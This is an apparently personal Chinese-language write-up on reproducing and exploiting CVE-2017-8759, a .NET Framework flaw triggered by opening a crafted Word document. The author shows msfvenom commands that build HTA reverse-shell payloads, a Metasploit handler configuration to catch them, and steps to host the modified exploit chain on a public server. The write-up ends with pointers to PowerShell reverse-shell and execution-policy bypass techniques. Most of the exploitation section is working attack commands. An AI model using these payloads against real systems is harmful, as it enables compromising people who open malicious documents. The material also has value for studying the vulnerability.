CVE-2017-8759 微软word漏洞复现以及利用

CVE-2017-8759 微软word漏洞复现以及利用

0x00 漏洞描述

近日，360集团核心安全事业部分析团队发现一个新型的Office文档高级威胁攻击，攻击使用了9月12日补丁刚修复的.NET Framework漏洞，该漏洞在野外被利用时为0day状态，用户打开恶意的Office文档就会中招。该漏洞的技术原理和今年黑客“奥斯卡”Pwnie Awards上的最佳客户端漏洞（CVE-2017-0199）如出一辙，不同的是，这次黑客在Offcie文档中嵌入新的Moniker对象，利用的是.net库漏洞，在Office文档中加载执行远程的恶意.NET代码，而整个漏洞的罪魁祸首竞是.NET Framework一个换行符处理失误。

影响范围：

Microsoft .NET Framework 4.6.2

Microsoft .NET Framework 4.6.1

Microsoft .NET Framework 3.5.1

Microsoft .NET Framework 4.7

Microsoft .NET Framework 4.6

Microsoft .NET Framework 4.5.2

Microsoft .NET Framework 3.5

Microsoft .NET Framework 2.0 SP2

0x01 验证漏洞

exploit-sample地址：https://github.com/Voulnet/CVE-2017-8759-Exploit-sample

将文件下载下来，打开所在的文件夹，在当前文件夹创建一个命令行，运行：

python -m SimpleHTTPServer 8080

这个时候我们已经在本地的8080端口创建了一个服务器了

然后打开doc文件，启用编辑，就会弹出画图工具，漏洞验证成功

0x02 漏洞利用

环境说明：

• ip： 120.27.32.227 这是我在公网的主机
• ip： 192.168.242.137 虚拟机的kali
• 靶机： windows7 我的实体机，虚拟机没有装了office的

1. 分析流程

word的宏

exploit.txt 文件

cmd.hta文件

所以流程是：

word宏 ==》 exploit.txt ==》 cmd.hta

2. 修改利用

1. 我将exploit.txt修改成如下然后上传到我自己的服务器120.27.32.227

访问文件

fn.hta是我用msfvenom生成的，具体命令如下

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.242.137 LPORT=7777 -f hta-psh -o /var/fn.hta

或者

msfvenom -p windows/x64/shell/reverse_tcp LHOST=192.168.242.137 LPORT=7777 -f hta-psh -o /var/fn.hta

1. 修改宏

1. 然后上传fn.hta到服务器120.27.32.227

3.验证

虚拟机kali(192.168.242.137)启动metasploit

use exploit/multi/handler 

set PAYLOAD windows/x64/shell/reverse_tcp

set LHOST 192.168.242.137

set LPORT 7777

exploit

修改过宏的文档在win7打开，反弹回来一个shell

打开word文档的这个过程，360会进行提示但不是报毒，最后还会留下这么一个窗口

至此，漏洞验证到利用结束

0x03 漏洞利用思路

• 可以利用powershell进行注入反弹，gitHub地址：https://github.com/besimorhino/powercat
• 也可以利用hta文件

这两者利用参考文章freebuf有：http://www.freebuf.com/sectool/90362.html

最后，参考文档：

• 漏洞预警：http://bobao.360.cn/learning/detail/4416.html
• powershell反弹shell: https://www.secpulse.com/archives/32096.html
• powersehll注入技巧：http://bobao.360.cn/learning/detail/3808.html
• 绕过PowerShell Execution Policy：http://www.freebuf.com/articles/system/93829.html